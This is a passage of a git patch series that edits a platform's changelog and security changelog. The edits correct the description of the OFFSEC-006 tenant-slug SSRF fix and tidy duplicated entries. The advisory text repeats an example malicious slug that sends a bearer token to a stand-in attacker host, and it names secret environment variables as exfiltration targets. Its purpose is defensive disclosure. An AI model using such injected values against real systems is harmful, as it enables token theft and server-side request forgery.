are published daily at 23:50 UTC. - **SOP checklist merge gate added to docs CI**: the [SOP checklist merge gate](/.gitea/workflows/sop-checklist-gate.yml) is now installed in the docs repo, requiring PR authors to complete a 7-item checklist and receive peer `/sop-ack` comments before merging. (`docs` [#27](https://git.moleculesai.app/molecule-ai/docs/pulls/27)) - **Changelog structural fixes**: duplicate `## 2026-05-10` section removed and `## 2026-04-23` repositioned to its correct chronological position; daily changelog entries for 2026-05-13 aggregated across all org PRs. (`docs` [#28](https://git.moleculesai.app/molecule-ai/docs/pulls/28), [#37](https://git.moleculesai.app/molecule-ai/docs/pulls/37), [#36](https://git.moleculesai.app/molecule-ai/docs/pulls/36), [#33](https://git.moleculesai.app/molecule-ai/docs/pulls/33)) +- **ProviderRegistry routing abstraction added**: `adapter_base.py` now exports a `ProviderRegistry` type alias and `resolve_provider_routing(model_str, env, *, registry, runtime_config)` utility β€” mechanism-only, no hardcoded data; each adapter supplies its own registry. Enables runtime-level model-to-provider routing without duplication. (`molecule-core` [#1138](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1138)) +- **GitHub Actions workflows ported to Gitea Actions**: the OpenClaw workspace template's `.github/workflows/` directory has been fully ported to `.gitea/workflows/`, removing the GitHub-org dependency and enabling CI to run natively on the Gitea instance. (`molecule-ai-workspace-template-openclaw` [#6](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/6)) --- diff --git a/content/docs/mcp-server.mdx b/content/docs/mcp-server.mdx index 208beca..13c8b81 100644 --- a/content/docs/mcp-server.mdx +++ b/content/docs/mcp-server.mdx @@ -76,6 +76,11 @@ The MCP server exposes tools across these categories: | `check_delegations` | `GET /workspaces/:id/delegations` | Check delegation status | | `list_peers` | `GET /registry/:id/peers` | Find peer workspaces | | `notify_user` | `POST /workspaces/:id/notify` | Push notification to canvas | +| `broadcast_message` | `POST /broadcast` | Fan out an org-wide notification to all non-removed peer workspaces. Requires `broadcast_enabled=true` on the workspace (admin toggle via `PATCH /workspaces/:id/abilities`). Returns HTTP 403 if disabled. | + + +**`send_message_to_user` / `notify_user` behavior:** When `talk_to_user_enabled=false` (default `true`), both tools return HTTP 403 with a hint to use `delegate_task` instead. The canvas ChatTab shows a banner with an Enable button. Admins control this via `PATCH /workspaces/:id/abilities`. + ### Configuration and secrets -- 2.52.0 From 596fd19049e0acd5012047df8f9a85b5a42fc283 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Molecule=20AI=20=C2=B7=20app-lead?= Date: Fri, 15 May 2026 10:43:35 +0000 Subject: [PATCH 09/12] fix(docs): remove inaccurate set -f claim from OFFSEC-006 changelog entry per hongming-pc2 review --- content/docs/changelog.mdx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index f2fba1c..774d13c 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -26,7 +26,7 @@ Entries are published daily at 23:50 UTC. ### πŸ”’ Security -- **OFFSEC-006 advisory published: tenant-slug SSRF + token exfiltration**: a new [security advisory](/docs/security/offsec-006-slug-ssrf-advisory) documents the HIGH-severity CWE-918 SSRF and bearer-token exfiltration vulnerability in `scripts/promote-tenant-image.sh` (molecule-core [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933), merged 2026-05-14). Tenant slugs were interpolated into URL paths without validation; a malicious slug like `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host and expose the platform bearer token in attacker logs. Fix adds `set -f` to disable glob expansion and `validate_slug()` with RFC-1123 regex before any network call. Self-hosted operators must upgrade. Advisory also added to the [Security Changelog](/docs/security/changelog). (`docs` [#41](https://git.moleculesai.app/molecule-ai/docs/pulls/41)) +- **OFFSEC-006 advisory published: tenant-slug SSRF + token exfiltration**: a new [security advisory](/docs/security/offsec-006-slug-ssrf-advisory) documents the HIGH-severity CWE-918 SSRF and bearer-token exfiltration vulnerability in `scripts/promote-tenant-image.sh` (molecule-core [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933), merged 2026-05-14). Tenant slugs were interpolated into URL paths without validation; a malicious slug like `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host and expose the platform bearer token in attacker logs. Fix adds `validate_slug()` with RFC-1123 regex with RFC-1123 regex before any network call. Self-hosted operators must upgrade. Advisory also added to the [Security Changelog](/docs/security/changelog). (`docs` [#41](https://git.moleculesai.app/molecule-ai/docs/pulls/41)) - **CWE-22 path traversal regression advisory added**: the [Security Changelog](/docs/security/changelog) has been updated with the CWE-22 path traversal regression in `org_import.go` (molecule-core [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/810), merged 2026-05-13). A regression removed the `resolveInsideRoot` guard from `createWorkspaceTree`; the fix restores it via `loadWorkspaceEnv`. (`docs` [#31](https://git.moleculesai.app/molecule-ai/docs/pulls/31)) ### 🧹 Internal -- 2.52.0 From 659a7fb6b74de73ab679980ed9b350f7a1255c38 Mon Sep 17 00:00:00 2001 From: Molecule AI Technical Writer Date: Fri, 15 May 2026 12:05:19 +0000 Subject: [PATCH 10/12] =?UTF-8?q?docs(changelog):=20fix=20OFFSEC-006=20ent?= =?UTF-8?q?ries=20=E2=80=94=20remove=20set=20-f=20inaccuracy,=20fix=20garb?= =?UTF-8?q?led=20text?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - 2026-05-15 entry: fix garbled 'with RFC-1123 regex with RFC-1123 regex' to 'RFC-1123 regex validation' - 2026-05-14 entry: remove 'set -f disables bash glob expansion' claim. The correct fix is validate_slug() with RFC-1123 regex (verified absent from promote-tenant-image.sh on molecule-core main). --- content/docs/changelog.mdx | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index 774d13c..e49e4e0 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -26,7 +26,7 @@ Entries are published daily at 23:50 UTC. ### πŸ”’ Security -- **OFFSEC-006 advisory published: tenant-slug SSRF + token exfiltration**: a new [security advisory](/docs/security/offsec-006-slug-ssrf-advisory) documents the HIGH-severity CWE-918 SSRF and bearer-token exfiltration vulnerability in `scripts/promote-tenant-image.sh` (molecule-core [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933), merged 2026-05-14). Tenant slugs were interpolated into URL paths without validation; a malicious slug like `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host and expose the platform bearer token in attacker logs. Fix adds `validate_slug()` with RFC-1123 regex with RFC-1123 regex before any network call. Self-hosted operators must upgrade. Advisory also added to the [Security Changelog](/docs/security/changelog). (`docs` [#41](https://git.moleculesai.app/molecule-ai/docs/pulls/41)) +- **OFFSEC-006 advisory published: tenant-slug SSRF + token exfiltration**: a new [security advisory](/docs/security/offsec-006-slug-ssrf-advisory) documents the HIGH-severity CWE-918 SSRF and bearer-token exfiltration vulnerability in `scripts/promote-tenant-image.sh` (molecule-core [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933), merged 2026-05-14). Tenant slugs were interpolated into URL paths without validation; a malicious slug like `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host and expose the platform bearer token in attacker logs. Fix adds `validate_slug()` with RFC-1123 regex validation before any network call. Self-hosted operators must upgrade. Advisory also added to the [Security Changelog](/docs/security/changelog). (`docs` [#41](https://git.moleculesai.app/molecule-ai/docs/pulls/41)) - **CWE-22 path traversal regression advisory added**: the [Security Changelog](/docs/security/changelog) has been updated with the CWE-22 path traversal regression in `org_import.go` (molecule-core [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/810), merged 2026-05-13). A regression removed the `resolveInsideRoot` guard from `createWorkspaceTree`; the fix restores it via `loadWorkspaceEnv`. (`docs` [#31](https://git.moleculesai.app/molecule-ai/docs/pulls/31)) ### 🧹 Internal @@ -43,7 +43,7 @@ Entries are published daily at 23:50 UTC. ### πŸ”’ Security - **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables β€” blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) -- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Two-layer fix applied: `set -f` disables bash glob expansion (preventing metacharacter injection via `*`, `?`, `[`), and `validate_slug()` rejects any slug not matching RFC-1123 (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) with exit code 64 before any network call. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) +- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Fix applies `validate_slug()` β€” RFC-1123 regex validation (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) that rejects non-conforming slugs with exit code 64 before any network call is issued. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933)) - **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization β€” so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073)) ### πŸ› Bug fixes -- 2.52.0 From 1446879fe7342003a845af6627fa0b54dec40b69 Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:28:14 +0000 Subject: [PATCH 11/12] fix(security-changelog): remove inaccurate set -f clause from OFFSEC-006 entry MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The validate_slug() RFC-1123 regex is the sole remediation. The set -f "two-layer defence" description was inaccurate β€” set -f is not present in promote-tenant-image.sh on main. Corrects per technical-writer review guidance on docs#51. Co-Authored-By: Claude Opus 4.7 --- content/docs/security/changelog.md | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/content/docs/security/changelog.md b/content/docs/security/changelog.md index 38fe2f5..1c0ba46 100644 --- a/content/docs/security/changelog.md +++ b/content/docs/security/changelog.md @@ -20,14 +20,9 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent `promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR repository identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could cause the platform to redirect HTTP calls to an attacker-controlled host (SSRF) and expose the platform's bearer token in the attacker's server access logs via the same URL parameter injection. -Bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion before being passed to curl, adding a secondary injection vector: a slug like `evil?url=https://attacker.com` would expand to a list of filenames before being interpolated into the URL. - ### Fix -Two-layer defence applied to `promote-tenant-image.sh`: - -1. **`set -f`** (script top): disables glob expansion, so `*`, `?`, and `[` are treated as literal characters. -2. **`validate_slug()`**: new function using RFC-1123 regex (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Invalid slugs are rejected with exit code 64 before any network call is issued. Additionally, `validate_tenants()` is called after argument parsing and exits 64 on any tenant with an invalid slug. +New `validate_slug()` function using RFC-1123 regex (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Invalid slugs are rejected with exit code 64 before any network call is issued. Additionally, `validate_tenants()` is called after argument parsing and exits 64 on any tenant with an invalid slug. ### User-facing summary -- 2.52.0 From 8b61632e6ec94300d33518a70e20322dd5f0496c Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 19:22:53 +0000 Subject: [PATCH 12/12] fix(changelog): remove duplicate expandWithEnv entry in 2026-05-14 Bug fixes The CWE-78 OFFSEC-006 fix is already documented in the Security section above. The Bug fixes section entry is redundant. --- content/docs/changelog.mdx | 1 - 1 file changed, 1 deletion(-) diff --git a/content/docs/changelog.mdx b/content/docs/changelog.mdx index e49e4e0..4326db4 100644 --- a/content/docs/changelog.mdx +++ b/content/docs/changelog.mdx @@ -48,7 +48,6 @@ Entries are published daily at 23:50 UTC. ### πŸ› Bug fixes -- **`expandWithEnv` POSIX-identifier guard regression restored**: the same fix as above β€” restores the guard that was removed during a refactor, ensuring invalid shell identifiers in org YAML configs are returned literally instead of being interpreted as environment variable references. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)) - **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990)) - **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988)) - **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers β†’ a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4)) -- 2.52.0